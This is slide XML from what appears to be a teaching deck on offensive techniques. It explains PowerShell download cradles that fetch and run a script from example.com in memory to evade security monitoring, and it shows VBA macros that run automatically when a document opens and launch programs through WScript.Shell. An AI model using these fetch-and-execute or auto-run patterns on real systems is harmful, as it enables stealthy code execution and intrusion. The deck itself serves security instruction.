              </a:rPr>
              <a:t>by hiding the malicious payload within the HTML code of a legitimate website.</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086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DCE6-926D-30A6-B91A-C9007F601651}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657606" y="637876"/>
            <a:ext cx="10772775" cy="750272"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Download Cradle vs. Traditional File Transfer Methods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BEF2DF-175D-555C-DD53-E4BF55D39405}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="676656" y="1013012"/>
            <a:ext cx="10753725" cy="4764853"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>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Traditional file transfer methods like FTP or HTTP usually require writing a file to disk, opening opportunities for detection by security software. </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Download cradles, on the other hand, allow code execution in-memory, without touching the filesystem. </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This makes them indispensable when trying to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>minimize exposure from security monitoring tools.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" sz="18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07439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DCE6-926D-30A6-B91A-C9007F601651}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657606" y="431688"/>
            <a:ext cx="10772775" cy="581324"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Common PowerShell Cmdlets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BEF2DF-175D-555C-DD53-E4BF55D39405}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="676656" y="1013012"/>
            <a:ext cx="10753725" cy="4764853"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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`Invoke-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>WebRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>`: Retrieves content from a web page. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">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`Invoke-Expression`: Executes a specified string as a PowerShell command. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">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System.Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>`: A .NET class that enables interaction with web servers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">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IEX` is an alias for `Invoke-Expression`. The `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>` object retrieves the content of ‘http://example.com/myscript.ps1’, and `Invoke-Expression` executes it in-memory.</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804D5DF7-6CAF-E11F-757B-853F8E552653}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1596450" y="3895860"/>
            <a:ext cx="8350961" cy="613388"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1662782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DCE6-926D-30A6-B91A-C9007F601651}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657606" y="431688"/>
            <a:ext cx="10772775" cy="581324"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Message Box Display - Macros</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="36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610626E-F14F-49E3-C60A-6BF969F603C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="788893" y="1122926"/>
            <a:ext cx="9403977" cy="4801314"/>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Sub </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Doccument_Open</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MsgBoxDisplay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End Sub</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Sub AutoOpen()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>MsgBoxDisplay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End Sub</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Sub </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>MsgBoxDisplay</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Dim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>msglong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> As Long 'Variable Declaration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>msglong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> = 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>msglong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> &gt; 5 Then</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MsgBox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> ("True")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Else</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>For Counter = 1 To 2 ' For loop to print the message box two times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MsgBox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> (" Macros Executed Successfully")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Next Counter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>End If</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>End Sub</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2292559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DCE6-926D-30A6-B91A-C9007F601651}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657606" y="431688"/>
            <a:ext cx="10772775" cy="581324"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Message Box Display - Macros</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"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22A0BAF-0522-DEFE-309E-356F316CD880}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect b="5229"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="657606" y="1196676"/>
            <a:ext cx="5644582" cy="4011818"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D699D34F-9F7F-748D-9F98-84E9A99C0A89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect b="6295"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6421899" y="2831467"/>
            <a:ext cx="5112495" cy="3594845"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4097497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DCE6-926D-30A6-B91A-C9007F601651}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657606" y="431688"/>
            <a:ext cx="10772775" cy="581324"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Open a program in VBA Macros</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"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0B5DE15-C630-7F7B-4CB6-6AEEBA345687}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="932329" y="1298591"/>
            <a:ext cx="6096000" cy="286232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Sub AutoOpen()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ExecuteCommand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End Sub</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Sub </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ExecuteCommand</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Dim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> As String</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Dim shell As Object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Set shell = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>CreateObject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WScript.Shell</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shell.Run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> "notepad.exe"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Set shell = Nothing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>End Sub</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25508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DCE6-926D-30A6-B91A-C9007F601651}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657606" y="431688"/>
            <a:ext cx="10772775" cy="581324"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Open a program in VBA Macros</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3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6FE5E5-309B-280B-F48E-A603DEB43D1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="375522" y="1246094"/>
            <a:ext cx="5281207" cy="3594845"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5BF8A30-70C6-869C-706C-76C5CC60127D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="11640" t="11372" r="1250" b="9150"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5789197" y="2868707"/>
            <a:ext cx="6286262" cy="3442447"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3665761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DCE6-926D-30A6-B91A-C9007F601651}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657606" y="431688"/>
            <a:ext cx="10772775" cy="581324"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Shortcut to open the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>MSapps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BEF2DF-175D-555C-DD53-E4BF55D39405}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="676656" y="1013012"/>
            <a:ext cx="10753725" cy="4764853"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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Developer tab – file -&gt; options -&gt; customize Ribbon -&gt; Main Tabs -&gt; select Developer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">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6B8BF0CD-A5C3-5B9C-21AD-B5674EC192F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="33750" t="8105" r="12426" b="14771"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="676656" y="2055906"/>
            <a:ext cx="4675273" cy="3564965"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AA7B190-0957-743D-E376-A386873D9980}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="808" t="6295" r="7279" b="6295"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5558118" y="2055905"/>
            <a:ext cx="6176682" cy="3564965"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="378697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DCE6-926D-30A6-B91A-C9007F601651}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700087" y="295836"/>
            <a:ext cx="10772775" cy="674313"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
